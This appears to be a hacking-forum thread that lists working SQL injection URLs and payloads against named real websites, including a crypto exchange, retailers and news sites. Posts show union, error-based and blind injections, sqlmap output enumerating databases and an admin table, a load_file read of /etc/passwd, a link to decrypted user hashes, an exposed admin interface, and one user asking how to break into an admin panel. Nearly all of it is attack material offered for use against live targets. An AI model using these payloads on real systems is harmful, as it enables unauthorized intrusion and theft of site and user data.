target: http://atmarine.fi type: Error-Based user: [email protected] db: 5.5.51-MariaDB Code: http://atmarine.fi/index.php?id=2 AND (SELECT 2796 FROM(SELECT COUNT(*),CONCAT_WS(CHAR(32,58,32),user(),database(),version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) target: http://www.ubraintv.com type: Union-Based user: ubraintv@localhost db: 5.1.73 MySQL Code: http://www.ubraintv.com/watchchannel.php?id=6' UNION ALL SELECT 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7-- -
www.yorgasmic.com/article.php?id=148 Code: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=148 AND 3436=3436 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=148 OR (SELECT 2443 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2443=2443,1))),0x7178706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=148 AND SLEEP(5) ---
ALEXA 12,361 Code: http://singtao.ca/events/Thatcher/article.php?ID=1+union+all+select+null,null,null,load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
http://www.aseanmarketplace.net/featured-listings.php?id= Code: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: id=-2582 OR 5132=5132 Type: AND/OR time-based blind Title: MySQL time-based blind - Parameter replace (MAKE_SET) Payload: id=MAKE_SET(8180=8180,SLEEP(5)) --- available databases [2]: [*] amp [*] information_schema Table: admin [1 entry] +----+----------+----------------------------------+ | id | username | password | +----+----------+----------------------------------+ | 1 | read | the first post | +----+----------+----------------------------------+ how do I get into the admin panel, /administrator won't let me in... what should I do - maybe someone can advise....
Code: http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14-- Code: http://www.jmtv.com/news.php?id=-3+union+select+1,version(),database()--
Code: http://plasticospardo.com/english/noticias.php?id=-16+union+select+1,2,version(),4,database(),user(),7--
PHP: http://manul.tv/watch_video.php?v=R6DW4G16RRS8%27+and+false+union+select+database(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+--+-
target: http://illan-gifts.ru type: Error-Based user: wapp@localhost version: 5.5.52-MariaDB Code: http://illan-gifts.ru/1'and(ExtractValue(1,concat(0x5c,(user()))))and'
Code: http://www.jamestrussart.com/gallery.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11 Number 2 is displayed.
Code: https://c2-europe.eu/news-full.php?id=-1049+union+select+1,2,3,version(),5,6,database(),8,9,10,user(),12,13,14-- Code: http://monroerec.com/event.php?id=-24%27+UnIOn+SeLEcT+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Code: https://www.unique-vintage.com/apps/swymEmails/interfaces/interfaceStore.php?appname=Emails Parameter: appname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: appname=Emails' AND 8893=8893-- ZiPX --- [12:48:01] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 available databases [5]: [*] information_schema [*] mysql [*] pbcomput_swym [*] performance_schema [*] sys
Code: https://www.mato-gmbh.com/produkte/mview'and(extractvalue(null,concat(1,(select+user()))))='1/251/?PHPSESSID=99f3768df8485b713f55dc60de16c1aa
DA49 Code: https://www.bfz.de/seminarfinder?the_id=13&zieg_id=-8+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17+--+&foern_id=1&vanort=&umkreis=10&stichwort=&sort=entf&submitted=1 Microsoft SQL Server 2008 R2 (SP3)
http://www.elektronika.ru/index.php...s(0x3a3a,version(),user(),database()),3,4,6-- 5.5.52-MariaDB::edbuser@localhost::elektronika
Crypto exchange, blind injection. Code: sqlmap -u "https://www.ccnex.com/index.php?before_group=3&c=member_controller&m=upgrade&now_group=5&s=help&username=if" -p "username" --dbms=mysql --level=3 --risk=3 --random-agent --dbs
Code: http://top.magreklama.ru/ Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=260 AND 9312=9312 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=260 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=-3254 UNION ALL SELECT CONCAT(0x71766a6a71,0x686e626c4b547a41514a7841524666765564447557656e73737257757144446b4845694370475458,0x717a767871)-- Tzua --- web server operating system: Linux Ubuntu web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 --- web server operating system: Linux Ubuntu web application technology: Nginx, PHP 5.3.10 back-end DBMS: MySQL >= 5.0.12 Decrypted hashes from the table rekl_kv_naozero.users in hashass form http://zalil.su/6334652
Code: TECOM is a dynamically developing telecommunications company that has accumulated solid experience in the design, supply and installation of communications equipment, and that also provides communications and Internet access services. We offer our clients effective and prompt solutions to the problems that arise in organizing telephone communications and operating telecommunications equipment. Code: http://www.tecom.ru/internet.php?id=-3+union+select+1,version(),database()-- I wrote to the admins, but they turned out not to give a damn about any of it, so I decided to post it here... P.S. There is also a CommuniGate Pro administrative interface there Code: http://81.3.154.236:8010/Master/MainAdmin/
Code: https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,4,5,6,7,8,9-- Code: https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9-- Code: https://www.thecatching.com/news.php?id=-41+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+limit%201,1-- changed it...